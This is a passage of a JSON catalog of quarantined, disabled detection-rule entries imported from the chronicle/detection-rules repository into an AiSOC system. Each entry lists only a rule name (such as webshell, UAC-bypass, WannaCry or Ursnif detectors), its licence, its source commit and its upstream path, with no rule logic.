"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-suspicious-filewrites-to-sharepoint-layouts", "type": "detection", "name": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "description": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-suspicious-filewrites-to-sharepoint-layouts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_suspicious_filewrites_to_sharepoint_layouts.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-w3wp-launching-encoded-powershell", "type": "detection", "name": "ttp_windows_w3wp_launching_encoded_powershell", "description": "ttp_windows_w3wp_launching_encoded_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-w3wp-launching-encoded-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_w3wp_launching_encoded_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_w3wp_launching_encoded_powershell.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-webserver-process-potential-webshell-execution", "type": "detection", "name": "ttp_windows_webserver_process_potential_webshell_execution", "description": "ttp_windows_webserver_process_potential_webshell_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-webserver-process-potential-webshell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_webserver_process_potential_webshell_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_webserver_process_potential_webshell_execution.yaral" } }, { "id": "chronicle-detection-rules-tunnel-rdp-out-port-443", "type": "detection", "name": "tunnel_rdp_out_port_443", "description": "tunnel_rdp_out_port_443", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/tunnel-rdp-out-port-443.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "tunnel_rdp_out_port_443", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/tunnel_rdp_out_port_443.yaral" } }, { "id": "chronicle-detection-rules-turla-backdoor-sysmon", "type": "detection", "name": "turla_backdoor_sysmon", "description": "turla_backdoor_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/turla-backdoor-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "turla_backdoor_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/turla_backdoor__sysmon.yaral" } }, { "id": "chronicle-detection-rules-turla-scheduled-task-and-host-fingerprinting-detector-sysmon-behavior", "type": "detection", "name": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "description": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/turla-scheduled-task-and-host-fingerprinting-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/turla_scheduled_task_and_host_fingerprinting_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-uac-bypass-via-event-viewer", "type": "detection", "name": "uac_bypass_via_event_viewer", "description": "uac_bypass_via_event_viewer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/uac-bypass-via-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "uac_bypass_via_event_viewer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/uac_bypass_via_event_viewer.yaral" } }, { "id": "chronicle-detection-rules-uac-bypass-via-sdclt", "type": "detection", "name": "uac_bypass_via_sdclt", "description": "uac_bypass_via_sdclt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/uac-bypass-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "uac_bypass_via_sdclt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/uac_bypass_via_sdclt.yaral" } }, { "id": "chronicle-detection-rules-unauthenticated-file-read-in-cisco-asa-cisco-firepower-cve20203452-via-web", "type": "detection", "name": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "description": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unauthenticated-file-read-in-cisco-asa-cisco-firepower-cve20203452-via-web.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/unauthenticated_file_read_in_cisco_asa___cisco_firepower_cve_2020_3452__via_web.yaral" } }, { "id": "chronicle-detection-rules-underminer-exploit-kit-delivers-malware", "type": "detection", "name": "underminer_exploit_kit_delivers_malware", "description": "underminer_exploit_kit_delivers_malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/underminer-exploit-kit-delivers-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "underminer_exploit_kit_delivers_malware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/underminer_exploit_kit_delivers_malware.yaral" } }, { "id": "chronicle-detection-rules-unusual-searchprotocolhost-child-process-via-cmdline", "type": "detection", "name": "unusual_searchprotocolhost_child_process_via_cmdline", "description": "unusual_searchprotocolhost_child_process_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-searchprotocolhost-child-process-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_searchprotocolhost_child_process_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/unusual_searchprotocolhost_child_process__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-unusual-solarwinds-child-process-via-cmdline", "type": "detection", "name": "unusual_solarwinds_child_process_via_cmdline", "description": "unusual_solarwinds_child_process_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-solarwinds-child-process-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_solarwinds_child_process_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/unusual_solarwinds_child_process__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-unusual-solarwinds-file-creation-via-filewrite", "type": "detection", "name": "unusual_solarwinds_file_creation_via_filewrite", "description": "unusual_solarwinds_file_creation_via_filewrite", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-solarwinds-file-creation-via-filewrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_solarwinds_file_creation_via_filewrite", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/unusual_solarwinds_file_creation__via_filewrite.yaral" } }, { "id": "chronicle-detection-rules-ursnif", "type": "detection", "name": "ursnif", "description": "ursnif", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ursnif.yaral" } }, { "id": "chronicle-detection-rules-ursnif-malware-detector-sysmon", "type": "detection", "name": "ursnif_malware_detector_sysmon", "description": "ursnif_malware_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif-malware-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif_malware_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ursnif_malware_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ursnif-trojan-detection-cmd-obfuscation", "type": "detection", "name": "ursnif_trojan_detection_cmd_obfuscation", "description": "ursnif_trojan_detection_cmd_obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif-trojan-detection-cmd-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif_trojan_detection_cmd_obfuscation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ursnif_trojan_detection__cmd_obfuscation.yaral" } }, { "id": "chronicle-detection-rules-usage-of-sysinternals-tools", "type": "detection", "name": "usage_of_sysinternals_tools", "description": "usage_of_sysinternals_tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usage-of-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usage_of_sysinternals_tools", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/usage_of_sysinternals_tools.yaral" } }, { "id": "chronicle-detection-rules-usb-device-plugged", "type": "detection", "name": "usb_device_plugged", "description": "usb_device_plugged", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usb-device-plugged.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usb_device_plugged", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/usb_device_plugged.yaral" } }, { "id": "chronicle-detection-rules-usb-file-stealer-usbguard-detector-sysmon", "type": "detection", "name": "usb_file_stealer_usbguard_detector_sysmon", "description": "usb_file_stealer_usbguard_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usb-file-stealer-usbguard-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usb_file_stealer_usbguard_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/usb_file_stealer__usbguard__detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-using-bashexe-in-windows", "type": "detection", "name": "using_bashexe_in_windows", "description": "using_bashexe_in_windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/using-bashexe-in-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "using_bashexe_in_windows", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/using_bash_exe_in_windows.yaral" } }, { "id": "chronicle-detection-rules-using-rasman-remote-access-connection-manager-windows-service-to-register-dll", "type": "detection", "name": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "description": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/using-rasman-remote-access-connection-manager-windows-service-to-register-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/using_rasman__remote_access_connection_manager__windows_service_to_register_dll.yaral" } }, { "id": "chronicle-detection-rules-vba-dll-loaded-via-microsoft-word", "type": "detection", "name": "vba_dll_loaded_via_microsoft_word", "description": "vba_dll_loaded_via_microsoft_word", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vba-dll-loaded-via-microsoft-word.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vba_dll_loaded_via_microsoft_word", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/vba_dll_loaded_via_microsoft_word.yaral" } }, { "id": "chronicle-detection-rules-vbsbased-malware-infection", "type": "detection", "name": "vbsbased_malware_infection", "description": "vbsbased_malware_infection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vbsbased-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vbsbased_malware_infection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/vbs_based_malware_infection.yaral" } }, { "id": "chronicle-detection-rules-vermin-backdoor-detector-sysmon", "type": "detection", "name": "vermin_backdoor_detector_sysmon", "description": "vermin_backdoor_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vermin-backdoor-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vermin_backdoor_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/vermin_backdoor_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-domain", "type": "detection", "name": "vt_relationships_file_contacts_domain", "description": "vt_relationships_file_contacts_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_domain.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-ip", "type": "detection", "name": "vt_relationships_file_contacts_ip", "description": "vt_relationships_file_contacts_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-tor-ip", "type": "detection", "name": "vt_relationships_file_contacts_tor_ip", "description": "vt_relationships_file_contacts_tor_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-tor-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_tor_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_tor_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-downloaded-from-ip", "type": "detection", "name": "vt_relationships_file_downloaded_from_ip", "description": "vt_relationships_file_downloaded_from_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-downloaded-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_downloaded_from_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_downloaded_from_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-downloaded-from-url", "type": "detection", "name": "vt_relationships_file_downloaded_from_url", "description": "vt_relationships_file_downloaded_from_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-downloaded-from-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_downloaded_from_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_downloaded_from_url.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-executes-file", "type": "detection", "name": "vt_relationships_file_executes_file", "description": "vt_relationships_file_executes_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-executes-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_executes_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_executes_file.yaral" } }, { "id": "chronicle-detection-rules-vulnerable-netlogon-secure-channel-connection-allowed", "type": "detection", "name": "vulnerable_netlogon_secure_channel_connection_allowed", "description": "vulnerable_netlogon_secure_channel_connection_allowed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vulnerable-netlogon-secure-channel-connection-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vulnerable_netlogon_secure_channel_connection_allowed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/system/vulnerable_netlogon_secure_channel_connection_allowed.yaral" } }, { "id": "chronicle-detection-rules-wannacry-ransomware", "type": "detection", "name": "wannacry_ransomware", "description": "wannacry_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wannacry-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wannacry_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wannacry_ransomware.yaral" } }, { "id": "chronicle-detection-rules-wannacry-ransomware-via-sysmon", "type": "detection", "name": "wannacry_ransomware_via_sysmon", "description": "wannacry_ransomware_via_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 